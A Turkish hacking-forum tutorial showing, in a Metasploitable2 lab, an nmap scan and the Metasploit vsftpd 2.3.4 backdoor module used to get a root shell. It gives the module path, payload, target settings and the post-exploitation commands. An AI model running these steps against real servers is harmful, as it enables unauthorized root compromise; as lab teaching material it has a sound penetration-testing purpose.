FTP Sunucu Hackleme (NMAP) (1 Viewer)

*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***

View hidden content is available for registered users!

Bu konuda, FTP protokolü üzerinde ki "vsftpd 2.3.4" uygulamasını exploit ederek hedef sistemde root yetkisine çıkmayı göstereceğim.

Sızma Testi senaryosunu gerçekleştirirken, laborotatuvar ortamı olarak, "métasploitable2-Linux" sistemini kullandım.

Artık anlatıma geçelim.

Öncelikle hedef sunucumuzda bir nmap ile port taraması yaparak keşif çalışmamızı yapalım.

"nmap -sV 192.168.127.130" hedef sunucumuzun İP adresidir.


Tarama sonucunda gördüğünüz gibi, FTP protokolü üzerinde, "vsftpd 2.3.4" uygulaması çalışmakta.

Biz de bunu kullanarak hedef sunucuya sızabiliriz.

Açalım bakalım, métasploit framework’ ümüzü

"msfconsole" diyerek açıyoruz.


search vsftpd" komutunu girerek explotimizi aradık.

"use exploit/unix/ftp/vsftpd_234_backdoor" exploitimize giriyoruz.

"show payloads" komutu ile exploite uygun payloadları arıyoruz ve "cmd/unix/interact" payloadını seçiyoruz.


ardından, "show options" komutunu girerek, genel ayarları yapıyoruz.

"set RHOST 192.168.127.130" ve "set RPORT 21" bilgilerini girerek exploiti çalıştırıyoruz.


exploit sonucunda, hedef sistemde root yetkisi kazanmış olduk.

UID: uid=0(root) gid=0(root)

görüldüğü üzere, "command shell session 1 opened" 1 shell oturumu açıldı. Artık linux komutlarıı çalıştırabiliriz. Gerisi
size kalmış.

"whoami" komutunu girdim, "root" çıktısını aldım. Bu demek oluyorki sen root kullanıcısısın artık.

"uname -a" komutu ile hedef sistemin kernel sürümünü öğrendim.

"ls" komutu ile bulunduğum dizinin dosyalarını listeledim. Ve çok şey yapabiliriz.
SON ;)


nmap-wordpress-script-scanning.png
 
Yanıt yazmak için giriş yapmalısınız
Forum özelliklerini kullanmak ve Level 2 üyelik satın almak için hesabınıza giriş yapın.

Users who are viewing this thread

133,353Konular
3,281,462Mesajlar
320,425Kullanıcılar
dfbgyrewSon Üye
Üst Alt